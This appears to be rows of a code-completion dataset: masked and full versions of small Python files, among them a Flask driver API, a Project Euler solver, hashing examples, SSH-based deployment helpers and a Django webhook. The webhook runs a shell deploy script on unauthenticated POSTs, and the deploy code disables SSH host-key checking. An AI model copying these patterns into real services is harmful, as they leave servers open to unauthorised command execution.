if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(
mimetype="application/json",
response=json.dumps(response),
status=status_code
)
| [
2,
5,
7,
9,
10
] |
1,691 | 7ca7693b842700a7b15242b656648e8a7e58cd23 | <mask token>
def isPrime(num):
if num <= 1:
return False
elif num == 2:
return True
elif num % 2 == 0:
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num) + 1
for i in range(3, bound, 2):
if num % i == 0:
return False
return True
def permutate(arr, n):
if n == len(arr):
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if isPrime(num):
global maxPandigitalPrime
if num > maxPandigitalPrime:
maxPandigitalPrime = num
else:
for i in range(n, len(arr)):
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr, n + 1)
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
<mask token>
| <mask token>
def isPrime(num):
if num <= 1:
return False
elif num == 2:
return True
elif num % 2 == 0:
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num) + 1
for i in range(3, bound, 2):
if num % i == 0:
return False
return True
def permutate(arr, n):
if n == len(arr):
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if isPrime(num):
global maxPandigitalPrime
if num > maxPandigitalPrime:
maxPandigitalPrime = num
else:
for i in range(n, len(arr)):
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr, n + 1)
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
<mask token>
for digit in range(2, 9):
arr = list(range(1, digit + 1))
permutate(arr, 0)
print(maxPandigitalPrime)
<mask token>
print(toc - tic)
| <mask token>
maxPandigitalPrime = 2
def isPrime(num):
if num <= 1:
return False
elif num == 2:
return True
elif num % 2 == 0:
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num) + 1
for i in range(3, bound, 2):
if num % i == 0:
return False
return True
def permutate(arr, n):
if n == len(arr):
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if isPrime(num):
global maxPandigitalPrime
if num > maxPandigitalPrime:
maxPandigitalPrime = num
else:
for i in range(n, len(arr)):
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr, n + 1)
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
tic = time.time()
for digit in range(2, 9):
arr = list(range(1, digit + 1))
permutate(arr, 0)
print(maxPandigitalPrime)
toc = time.time()
print(toc - tic)
| <mask token>
import time
import math
maxPandigitalPrime = 2
def isPrime(num):
if num <= 1:
return False
elif num == 2:
return True
elif num % 2 == 0:
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num) + 1
for i in range(3, bound, 2):
if num % i == 0:
return False
return True
def permutate(arr, n):
if n == len(arr):
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if isPrime(num):
global maxPandigitalPrime
if num > maxPandigitalPrime:
maxPandigitalPrime = num
else:
for i in range(n, len(arr)):
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr, n + 1)
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
tic = time.time()
for digit in range(2, 9):
arr = list(range(1, digit + 1))
permutate(arr, 0)
print(maxPandigitalPrime)
toc = time.time()
print(toc - tic)
| '''
Project Euler
Problem #41 - Pandigital prime
David 07/06/2017
'''
import time
import math
maxPandigitalPrime = 2
def isPrime(num):
if(num<=1):
return False
elif(num==2):
return True
elif(num%2==0):
return False
else:
sqrt_num = math.sqrt(num)
bound = int(sqrt_num)+1
for i in range(3,bound,2):
if(num%i==0):
return False
return True
def permutate(arr,n):
if(n==len(arr)):
#print(arr)
str_num = ''
for j in range(n):
str_num += str(arr[j])
num = int(str_num)
if(isPrime(num)):
global maxPandigitalPrime
if(num>maxPandigitalPrime):
maxPandigitalPrime = num
else:
for i in range(n,len(arr)):
# swap index n(head), i
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
permutate(arr,n+1)
# swap back to resume arr
temp = arr[i]
arr[i] = arr[n]
arr[n] = temp
# main
tic = time.time()
for digit in range(2,9):
arr = list(range(1,digit+1))
permutate(arr,0)
print(maxPandigitalPrime)
toc = time.time()
print(toc-tic)
| [
2,
3,
4,
5,
6
] |
1,692 | bbdb07a81d785bdf067707c4e56622a2ada76b7b | <mask token>
| from .ffm import *
from .fm import *
from .utils import *
from .base_model import *
from .base_trainer import *
from .logger import *
from .metric import *
from .input_fn import *
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/15 下午5:04
# @Author : Zessay
from .ffm import *
from .fm import *
from .utils import *
from .base_model import *
from .base_trainer import *
from .logger import *
from .metric import *
from .input_fn import * | null | null | [
0,
1,
2
] |
1,693 | a998433e45c1d5135749c5164e8ec1f2eb0e572a | <mask token>
| from job_description import JobDescription
from resume import Resume
from resume_manager import ResumeManager
| null | null | null | [
0,
1
] |
1,694 | 6f5bca8c1afcd9d9971a64300a576ca2b2f6ef70 | <mask token>
| <mask token>
class HookView(APIView):
<mask token>
| <mask token>
class HookView(APIView):
def post(self, request, *args, **kwargs):
SCRIPT_PATH = os.path.join(settings.BASE_DIR, 'deploy/hooks.sh')
payload = json.loads(request.data['payload'])
ref = payload['ref']
if ref == 'refs/heads/deploy':
output = subprocess.run(['bash', SCRIPT_PATH]).stdout
return Response(status=status.HTTP_200_OK, data=output)
return Response(status=status.HTTP_400_BAD_REQUEST)
| from django.shortcuts import render
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from django.conf import settings
import subprocess
import os
import json
class HookView(APIView):
def post(self, request, *args, **kwargs):
SCRIPT_PATH = os.path.join(settings.BASE_DIR, 'deploy/hooks.sh')
payload = json.loads(request.data['payload'])
ref = payload['ref']
if ref == 'refs/heads/deploy':
output = subprocess.run(['bash', SCRIPT_PATH]).stdout
return Response(status=status.HTTP_200_OK, data=output)
return Response(status=status.HTTP_400_BAD_REQUEST)
| from django.shortcuts import render
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from django.conf import settings
import subprocess
import os
import json
class HookView(APIView):
def post(self, request, *args, **kwargs):
SCRIPT_PATH = os.path.join(settings.BASE_DIR, 'deploy/hooks.sh')
# payload from webhook
payload = json.loads(request.data['payload'])
ref = payload['ref']
if ref == 'refs/heads/deploy':
output = subprocess.run(['bash', SCRIPT_PATH]).stdout
return Response(status=status.HTTP_200_OK, data=output)
return Response(status=status.HTTP_400_BAD_REQUEST)
| [
0,
1,
2,
3,
4
] |
1,695 | b210784a198eaa3e57b5a65ec182a746aecc0e2b | <mask token>
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
<mask token>
<mask token>
def bathe(self):
self.pet.noise()
<mask token>
| <mask token>
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
<mask token>
| <mask token>
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
<mask token>
Naruto.feed()
print(Naruto.pet.energy)
print(Naruto.pet.health)
Naruto.bathe()
Naruto.walk()
print(Naruto.pet.energy)
print(Naruto.pet.health)
| <mask token>
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
Fox = Pet('Ninetailed Fox', 'Fox', 'Fire-Breathing')
Naruto = Ninja('Naruto', 'Izumaki', 'Rice Balls', 'Ground Beef', Fox)
Naruto.feed()
print(Naruto.pet.energy)
print(Naruto.pet.health)
Naruto.bathe()
Naruto.walk()
print(Naruto.pet.energy)
print(Naruto.pet.health)
| from pet import Pet
class Ninja:
def __init__(self, first_name, last_name, treats, pet_food, pet):
self.first_name = first_name
self.last_name = last_name
self.treats = treats
self.pet_food = pet_food
self.pet = pet
def walk(self):
self.pet.play()
def feed(self):
self.pet.eat()
def bathe(self):
self.pet.noise()
Fox = Pet("Ninetailed Fox", "Fox", "Fire-Breathing")
Naruto = Ninja("Naruto", "Izumaki", "Rice Balls", "Ground Beef", Fox)
Naruto.feed()
print(Naruto.pet.energy)
print(Naruto.pet.health)
Naruto.bathe()
Naruto.walk()
print(Naruto.pet.energy)
print(Naruto.pet.health) | [
3,
5,
6,
7,
9
] |
1,696 | f3ff453655d7938cb417ce212f3836fabafaea43 | <mask token>
| def interseccao_chaves(lis_dic):
lista = []
for dic1 in lis_dic[0]:
for cahves in dic1:
lista.append(dic1)
for dic2 in lis_dic[1]:
for cahves in dic2:
lista.append(dic2)
return lista
| null | null | null | [
0,
1
] |
1,697 | 2c834c734de8f8740176bb5dbb6b123c49924718 | <mask token>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
<mask token>
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
<mask token>
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| <mask token>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
<mask token>
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
<mask token>
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| <mask token>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
def getHostsByKey(config, key):
hosts = config.get(key, 'hosts').split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
<mask token>
def deleteLineWithString(pathFile, stringResearch):
contenu = ''
fichier = open(pathFile, 'r')
for ligne in fichier:
if not stringResearch in ligne:
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| <mask token>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
def getHostsByKey(config, key):
hosts = config.get(key, 'hosts').split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
def isAlreadyAdd(pathFile, string):
file = open(pathFile)
for line in file:
if string in line:
return True
return False
def deleteLineWithString(pathFile, stringResearch):
contenu = ''
fichier = open(pathFile, 'r')
for ligne in fichier:
if not stringResearch in ligne:
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| #!/usr/bin/env python3
import os
import subprocess
import logging
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# Recover all ip for one component. Return format ip
def getHostsByKey(config, key):
hosts = config.get(key, "hosts").split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
# Function who return the ip of the current machine
def getIp():
ip = os.popen('ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'', "r").read()
ip = ip.replace('\n', '')
return ip
# Check if String il already present in the file
def isAlreadyAdd(pathFile, string):
file = open(pathFile)
for line in file:
if string in line:
return True
return False
def deleteLineWithString(pathFile, stringResearch):
contenu = ""
fichier = open(pathFile, "r")
for ligne in fichier:
if not (stringResearch in ligne):
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
# Function for check host
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
# Function for recover ip by using server name
def getIpServerName(config, serverName):
ip = ""
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], "hosts").split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
# Function for update file on specific server
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf', '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'],
cwd=os.getcwd(),
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info("Compressing directory done [success]")
else:
logging.error("Compressing directory failed [error]")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(
['scp', '-pq', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz',
'xnet@' + ip + ':~/'], check=True)
if out.returncode == 0:
logging.info("Transfer done [success]")
else:
logging.error("Transferring files failed [error]")
logging.info("Detar file ...")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info("Decompressing directory done [success]")
else:
logging.error("Decompressing directory failed [error]")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'rm SDTD-Mazerunner-Script.tar.gz'])
return
# Function for install basic environment
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
| [
5,
7,
9,
10,
12
] |
1,698 | ab4c668c8a167f8c387199b7aa49aa742d563250 | <mask token>
| <mask token>
print(md5.hexdigest())
<mask token>
print(sha1.hexdigest())
<mask token>
print(sha224.hexdigest())
<mask token>
print(sha256.hexdigest())
<mask token>
print(sha384.hexdigest())
<mask token>
print(sha512.hexdigest())
| <mask token>
md5 = hashlib.md5(b'Najmul')
print(md5.hexdigest())
sha1 = hashlib.sha1(b'Najmul')
print(sha1.hexdigest())
sha224 = hashlib.sha224(b'Najmul')
print(sha224.hexdigest())
sha256 = hashlib.sha256(b'Najmul')
print(sha256.hexdigest())
sha384 = hashlib.sha384(b'Najmul')
print(sha384.hexdigest())
sha512 = hashlib.sha512(b'Najmul')
print(sha512.hexdigest())
| import hashlib
md5 = hashlib.md5(b'Najmul')
print(md5.hexdigest())
sha1 = hashlib.sha1(b'Najmul')
print(sha1.hexdigest())
sha224 = hashlib.sha224(b'Najmul')
print(sha224.hexdigest())
sha256 = hashlib.sha256(b'Najmul')
print(sha256.hexdigest())
sha384 = hashlib.sha384(b'Najmul')
print(sha384.hexdigest())
sha512 = hashlib.sha512(b'Najmul')
print(sha512.hexdigest())
| null | [
0,
1,
2,
3
] |
1,699 | 99e6e734c7d638e3cf4d50d9605c99d5e700e82a | <mask token>
| <mask token>
if year % 4 == 0 and not year % 100 == 0:
print('YES')
elif year % 400 == 0:
print('yes')
else:
print('NO')
| year = int(input('введите год '))
if year % 4 == 0 and not year % 100 == 0:
print('YES')
elif year % 400 == 0:
print('yes')
else:
print('NO')
| # Дано натуральное число. Требуется определить,
# является ли год с данным номером високосным.
# Если год является високосным, то выведите `YES`, иначе выведите `NO`.
# Напомним, что в соответствии с григорианским календарем, год является високосным,
# если его номер кратен 4, но не кратен 100, а также если он кратен 400.
year = int(input('введите год '))
if year % 4 == 0 and not year % 100 == 0:
print('YES')
elif year % 400 == 0:
print('yes')
else:
print('NO')
| null | [
0,
1,
2,
3
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.